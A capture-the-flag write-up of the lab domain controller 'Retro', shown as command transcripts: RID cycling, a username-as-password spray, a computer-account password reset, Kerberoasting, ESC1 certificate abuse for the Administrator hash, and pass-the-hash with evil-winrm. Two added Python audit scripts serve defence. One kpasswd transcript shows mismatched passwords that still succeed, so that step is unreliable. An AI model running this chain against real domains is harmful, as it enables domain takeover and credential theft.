Overview

Retro is an easy Windows machine created by r0BIT. It starts off with RID cycling to get a list of usernames, and one of the users has their username as their password. I find a reference to pre-created computer accounts in an SMB share. After some enumeration I change the password of a pre-created computer account and use it to abuse an ESC1 vulnerability for the NT hash of Administrator. I’ll use the NT hash over WinRM for a shell and the root flag.

Nmap Scan

I’ll run nmap to get started:

獣 ~/vl/Retro/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.71.94 -oA retro
# Nmap 7.94SVN scan initiated Wed Oct 30 05:12:56 2024 as: /usr/lib/nmap/nmap -sCV --top-ports 10000 -T4 -vvvv -oA retro 10.10.71.94
Nmap scan report for 10.10.71.94
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2024-10-30 05:12:57 EDT for 131s
Not shown: 8355 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-30 09:13:40Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after: 2025-10-30T08:57:36
| MD5: c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after: 2025-10-30T08:57:36
| MD5: c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after: 2025-10-30T08:57:36
| MD5: c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after: 2025-10-30T08:57:36
| MD5: c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-30T09:14:22+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-29T09:06:30
| Not valid after: 2025-04-30T09:06:30
| MD5: 5019:f099:2d34:10ea:2a93:313d:0faf:606d
| SHA-1: 0b4c:2073:7f03:060b:2f90:66b6:daa1:bbc7:1766:f22e
...snip...
|_ssl-date: 2024-10-30T09:15:02+00:00; -4s from scanner time.
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-10-30T09:14:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 17105/tcp): CLEAN (Timeout)
| Check 2 (port 10686/tcp): CLEAN (Timeout)
| Check 3 (port 61857/udp): CLEAN (Timeout)
| Check 4 (port 28280/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -4s, deviation: 0s, median: -4s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 30 05:15:08 2024 -- 1 IP address (1 host up) scanned in 132.37 seconds

I can see all of the normal ports that would be open on a DC, so I’ll most likely start with SMB. I also see a CA, retro-DC-CA, which hints at ADCS being a later step.

Recon

445 - SMB

I’ll try Guest authentication in SMB:

獣 ~/vl/Retro/enumeration ➜ nxc smb 10.10.71.94 -u Guest -p '' --shares
SMB 10.10.71.94 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.71.94 445 DC [+] retro.vl\Guest:
SMB 10.10.71.94 445 DC [*] Enumerated shares
SMB 10.10.71.94 445 DC Share Permissions Remark
SMB 10.10.71.94 445 DC ----- ----------- ------
SMB 10.10.71.94 445 DC ADMIN$ Remote Admin
SMB 10.10.71.94 445 DC C$ Default share
SMB 10.10.71.94 445 DC IPC$ READ Remote IPC
SMB 10.10.71.94 445 DC NETLOGON Logon server share
SMB 10.10.71.94 445 DC Notes
SMB 10.10.71.94 445 DC SYSVOL Logon server share
SMB 10.10.71.94 445 DC Trainees READ

This works, I’ll look in the Trainees share:

獣 ~/vl/Retro/enumeration ➜ impacket-smbclient 10.10.71.94
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use Trainees
# ls
drw-rw-rw- 0 Sun Jul 23 18:16:11 2023 .
drw-rw-rw- 0 Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw- 288 Sun Jul 23 18:16:11 2023 Important.txt

There’s one file, Important.txt:

Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

Seems like the Administrator bundled all of the Trainees into one user.

Auth as trainee

Getting Creds

I’ll use lookupsid.py to get a list of users. I first need the FQDN so I’ll put it in my /etc/hosts:

10.10.71.94	DC.retro.vl retro.vl

Now I can run lookupsid.py:

獣 ~/vl/Retro/enumeration ➜ lookupsid.py retro.vl/Guest@DC.retro.vl 2000 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at DC.retro.vl
[*] StringBinding ncacn_np:DC.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)

I can see a few users:

tblack
jburley
BANKING$
trainee

I’ll password spray the username as the password via kerbrute:

獣 ~/vl/Retro/enumeration ➜ kerbrute passwordspray --dc DC.retro.vl -d retro.vl users.txt --user-as-pass

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 05:24:25 > Using KDC(s):
2024/10/30 05:24:25 > DC.retro.vl:88

2024/10/30 05:24:26 > [+] VALID LOGIN: trainee@retro.vl:trainee
2024/10/30 05:24:26 > Done! Tested 4 logins (1 successes) in 0.695 seconds

There’s one valid login, for the trainee user. I’ll test the credentials over SMB:

獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u trainee -p 'trainee' --shares
SMB 10.10.71.94 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.71.94 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.71.94 445 DC [*] Enumerated shares
SMB 10.10.71.94 445 DC Share Permissions Remark
SMB 10.10.71.94 445 DC ----- ----------- ------
SMB 10.10.71.94 445 DC ADMIN$ Remote Admin
SMB 10.10.71.94 445 DC C$ Default share
SMB 10.10.71.94 445 DC IPC$ READ Remote IPC
SMB 10.10.71.94 445 DC NETLOGON READ Logon server share
SMB 10.10.71.94 445 DC Notes READ
SMB 10.10.71.94 445 DC SYSVOL READ Logon server share
SMB 10.10.71.94 445 DC Trainees READ

Auth as BANKING$

Research

Now I can look at the Notes share:

獣 ~/vl/Retro/enumeration ➜ impacket-smbclient retro.vl/trainee@10.10.71.94
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use notes
# ls
drw-rw-rw- 0 Sun Jul 23 18:03:16 2023 .
drw-rw-rw- 0 Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw- 248 Sun Jul 23 18:05:56 2023 ToDo.txt

There’s a ToDo.txt file:

Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I see one pretty interesting mention in this file:

pre created computer account

I found an article about these types of computer accounts.

Auth as BANKING$ (Intended)

From reading this article, I see that pre-created computer accounts use the computer account name in lowercase (without the trailing $) as the password. I can test this via nxc:

獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u BANKING$ -p 'banking' --shares
SMB 10.10.71.94 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.71.94 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
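From the defender's side, the interesting question is how to find accounts like BANKING$ before someone else does. The following is an added example for this write-up (not the author's tooling, not Impacket or nxc code). It walks a list of computer objects in the shape of an LDAP export and flags the pre-Windows 2000 pattern. The heuristic is an assumption stated in the code: a pre-created account carries userAccountControl 4128 (WORKSTATION_TRUST_ACCOUNT plus PASSWD_NOTREQD), and if it has never logged on its password is still the lowercase hostname it was created with. SAMPLE_COMPUTERS is constructed for the demo and is not data from the lab.

```python
"""Flag pre-created (pre-Windows 2000) computer accounts in an AD export.

Added example for this write-up; it is not the author's tooling or Impacket/nxc
code. Input records mimic an LDAP export of computer objects (sAMAccountName,
userAccountControl, logonCount). SAMPLE_COMPUTERS is constructed for the demo.
"""
from dataclasses import dataclass
from typing import List, Optional

# Standard userAccountControl bits (MS-ADTS); only the ones this audit uses.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",
}
UF_PASSWD_NOTREQD = 0x0020
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000

SAMPLE_COMPUTERS = [
    # constructed: pre-created account that was never joined (4128 = 0x1020)
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128, "logonCount": 0},
    # constructed: a domain controller (SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION)
    {"sAMAccountName": "DC$", "userAccountControl": 532480, "logonCount": 812},
    # constructed: normally joined workstation
    {"sAMAccountName": "WS01$", "userAccountControl": 4096, "logonCount": 57},
    # constructed: flag still set, but the machine has logged on since
    {"sAMAccountName": "WS02$", "userAccountControl": 4128, "logonCount": 3},
]


@dataclass
class Finding:
    sam_account_name: str
    severity: str   # "high" = never used, password is presumably still the hostname
    reason: str


def decode_uac(uac: int) -> List[str]:
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def audit_computer(record: dict) -> Optional[Finding]:
    """Heuristic (assumption): a pre-created account carries
    WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD. If it has never logged on, the
    password is still the lowercase hostname assigned at creation."""
    uac = int(record["userAccountControl"])
    if not uac & UF_WORKSTATION_TRUST_ACCOUNT:
        return None  # user, DC or other non-member-computer object
    if not uac & UF_PASSWD_NOTREQD:
        return None
    name = record["sAMAccountName"]
    if int(record.get("logonCount", 0)) == 0:
        return Finding(name, "high",
                       "PASSWD_NOTREQD set and logonCount 0: pre-created account "
                       "that was never joined; disable or delete it")
    return Finding(name, "review",
                   "PASSWD_NOTREQD set on a joined computer; clear the flag so a "
                   "blank or weak password cannot be set on it")


def audit_computers(records) -> List[Finding]:
    return [f for f in (audit_computer(r) for r in records) if f]


if __name__ == "__main__":
    for f in audit_computers(SAMPLE_COMPUTERS):
        print(f"{f.sam_account_name:10} {f.severity:7} {f.reason}")
```

Run against the sample data, BANKING$ comes back as "high" and WS02$ as "review"; DC$ and WS01$ are not flagged. The STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT reply above is worth reading the same way: the DC accepted the password but refused that logon type, which is exactly the state a never-joined pre-created account sits in.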

Reading further down in the article shows that I need to change the password for this computer account before I can use it. I’ll do this with kpasswd, which needs a /etc/krb5.conf that points at the domain. Here’s my /etc/krb5.conf file:

[libdefaults]
default_realm = RETRO.VL
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
dns_lookup_realm = false
dns_lookup_kdc = true
k5login_authoritative = false
[realms]
RETRO.VL = {
kdc = DC.retro.vl
admin_server = retro.vl
default_admin = retro.vl
}
[domain_realm]
.retro.vl = RETRO.VL

Now I can run kpasswd:

獣 ~/vl/Retro/enumeration ➜ kpasswd BANKING$
Password for BANKING$@RETRO.VL:
Enter new password: banking
Enter it again: S3cur3P4ssw0rd!
Password changed.

I can test auth with the password S3cur3P4ssw0rd! now:

獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u BANKING$ -p 'S3cur3P4ssw0rd!' --shares
SMB 10.10.71.94 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.71.94 445 DC [+] retro.vl\BANKING$:S3cur3P4ssw0rd!
SMB 10.10.71.94 445 DC [*] Enumerated shares
SMB 10.10.71.94 445 DC Share Permissions Remark
SMB 10.10.71.94 445 DC ----- ----------- ------
SMB 10.10.71.94 445 DC ADMIN$ Remote Admin
SMB 10.10.71.94 445 DC C$ Default share
SMB 10.10.71.94 445 DC IPC$ READ Remote IPC
SMB 10.10.71.94 445 DC NETLOGON READ Logon server share
SMB 10.10.71.94 445 DC Notes READ
SMB 10.10.71.94 445 DC SYSVOL READ Logon server share
SMB 10.10.71.94 445 DC Trainees READ

Auth as BANKING$ (via GetUserSPNs.py)

A different way of getting the password for BANKING$ (kinda useless) would be through GetUserSPNs.py:

獣 ~/vl/Retro/enumeration ➜ GetUserSPNs.py -usersfile users.txt -dc-host 10.10.71.94 retro.vl/trainee@DC.retro.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] CCache file is not found. Skipping...
[-] Principal: tblack - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jburley - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*BANKING$$RETRO.VL$BANKING$*$6a8d366751674e175eb40197ea094ab8$9fc0c9b5bb2dbf802b41...snip...90ee6b73a3dd58127cd0af00434715fe251a62c1cd30ffceb640c587f7d2798d2c6f9d53815a51092874dfbaaf5f7988050f656
[-] Principal: trainee - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

As you can see, I got the TGS hash for BANKING$. I can run it through hashcat and it cracks successfully. Although this method isn’t anywhere near an “unintended” path, it’s still a cool find; after it you’d still just run kpasswd and go from there.

Shell as Administrator

ADCS Enum

Seeing as I can’t view any other SMB shares and can’t WinRM in, I’ll run certipy-ad to look for vulnerable templates:

獣 ~/vl/Retro/enumeration ➜ certipy-ad find -target DC.retro.vl -u trainee'@'retro.vl -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

There’s an ESC1 enrollable by Domain Computers. I have the BANKING$ account, which would work, but I’ll check the MAQ (MachineAccountQuota) just to be sure I can’t simply create a new computer account instead of using BANKING$:

獣 ~/Documents/hexo ➜ nxc ldap DC.retro.vl -u trainee -p trainee -M maq
SMB 10.10.71.94 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP 10.10.71.94 389 DC [+] retro.vl\trainee:trainee
MAQ 10.10.71.94 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.71.94 389 DC MachineAccountQuota: 0

The MAQ is 0, so I’ll have to use BANKING$ for the ESC1.
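The certipy output and the MAQ check together answer two questions: is the template ESC1-vulnerable, and who can actually reach it. The following is an added example for this write-up (not certipy's code and not the author's) that encodes both checks. RETRO_CLIENTS is a hand-built dictionary carrying the values certipy printed for the RetroClients template; the key names are this script's own, not certipy's JSON fields. LOW_PRIV_PRINCIPALS is an assumption about which groups any domain account can reach. The template's Minimum RSA Key Length is carried through in the finding because a CSR below it is rejected with CERTSRV_E_KEY_LENGTH, which is what happens on the first request attempt later in this write-up.

```python
"""Evaluate a certificate template for the ESC1 conditions certipy reports,
and whether MachineAccountQuota widens who can use it.

Added example for this write-up; not certipy's code. RETRO_CLIENTS mirrors the
values certipy printed for the RetroClients template, with this script's own
key names. LOW_PRIV_PRINCIPALS is an assumption about attacker-reachable groups.
"""
from dataclasses import dataclass, field
from typing import List, Optional

LOW_PRIV_PRINCIPALS = ("Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone")

RETRO_CLIENTS = {
    "name": "RetroClients",
    "enabled": True,
    "client_authentication": True,        # EKU contains Client Authentication
    "any_purpose": False,
    "enrollee_supplies_subject": True,    # Certificate Name Flag: EnrolleeSuppliesSubject
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "minimum_rsa_key_length": 4096,
    "enrollment_rights": [
        "RETRO.VL\\Domain Admins",
        "RETRO.VL\\Domain Computers",
        "RETRO.VL\\Enterprise Admins",
    ],
}


@dataclass
class Esc1Finding:
    template: str
    exposed_to: List[str]          # low-privilege principals holding Enroll
    min_key_size: int              # smallest RSA key the CA accepts in a CSR
    needs_existing_computer: bool  # only computers can enrol and MAQ is 0
    remediations: List[str] = field(default_factory=list)


def short_name(principal: str) -> str:
    """'RETRO.VL\\Domain Computers' -> 'Domain Computers'."""
    return principal.split("\\")[-1]


def low_priv_enrollers(rights: List[str]) -> List[str]:
    return [p for p in rights if short_name(p) in LOW_PRIV_PRINCIPALS]


def audit_esc1(t: dict, machine_account_quota: int) -> Optional[Esc1Finding]:
    """ESC1: enabled template, client-auth (or any-purpose) EKU, requester
    supplies the subject/SAN, no manager approval or co-signature, and a
    low-privilege principal may enrol."""
    if not t["enabled"]:
        return None
    if not (t["client_authentication"] or t["any_purpose"]):
        return None
    if not t["enrollee_supplies_subject"]:
        return None
    if t["requires_manager_approval"] or t["authorized_signatures_required"] > 0:
        return None
    exposed = low_priv_enrollers(t["enrollment_rights"])
    if not exposed:
        return None

    only_computers = {short_name(p) for p in exposed} == {"Domain Computers"}
    needs_existing = only_computers and machine_account_quota == 0

    fixes = [
        "Clear 'Supply in the request' (EnrolleeSuppliesSubject) or require CA manager approval",
        "Remove low-privilege groups from the template's Enroll rights",
    ]
    if only_computers and machine_account_quota > 0:
        fixes.append(f"MachineAccountQuota is {machine_account_quota}: any domain user can "
                     "create a computer account and enrol; set ms-DS-MachineAccountQuota to 0")
    return Esc1Finding(t["name"], exposed, t["minimum_rsa_key_length"], needs_existing, fixes)


if __name__ == "__main__":
    print(audit_esc1(RETRO_CLIENTS, machine_account_quota=0))
```

With the values from this box (MAQ 0, only Domain Computers exposed) the finding reports needs_existing_computer as True, which is the situation the write-up is in: the template is vulnerable, but exercising it requires an account that is already a member of Domain Computers. Had the MAQ been left at its default of 10, the same template would be reachable from any domain user, and the finding adds that as a third remediation.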

ESC1

I’ll abuse the ESC1 via certipy-ad by requesting the vulnerable template with the UPN administrator@retro.vl:

獣 ~/vl/Retro/enumeration ➜ certipy-ad req -u 'banking$'@retro.vl -template "RetroClients" -ca retro-DC-CA -upn administrator@retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 11
Would you like to save the private key? (y/N) N
[-] Failed to request certificate

I get a key-size error, since the template’s minimum RSA key length is 4096. I’ll set the key size to 4096:

獣 ~/vl/Retro/enumeration ➜ certipy-ad req -u 'banking$'@retro.vl -template "RetroClients" -ca retro-DC-CA -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now I can use this to get the NT hash for Administrator:

獣 ~/vl/Retro/enumeration ➜ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<redacted>

Shell as Administrator

With this I can WinRM to the machine:

獣 ~/vl/Retro/enumeration ➜ evil-winrm -i DC.retro.vl -u Administrator -H '<redacted>'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And with that I can get the root flag:

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/25/2023 12:38 PM 36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{<redacted>}

Thoughts

Retro was a really good machine in my opinion. I didn’t know anything about pre-created computer accounts until I did this machine. It was also one of the first machines I came across that required a specific key size when exploiting ESC1, so it was good to be exposed to figuring out how to do that.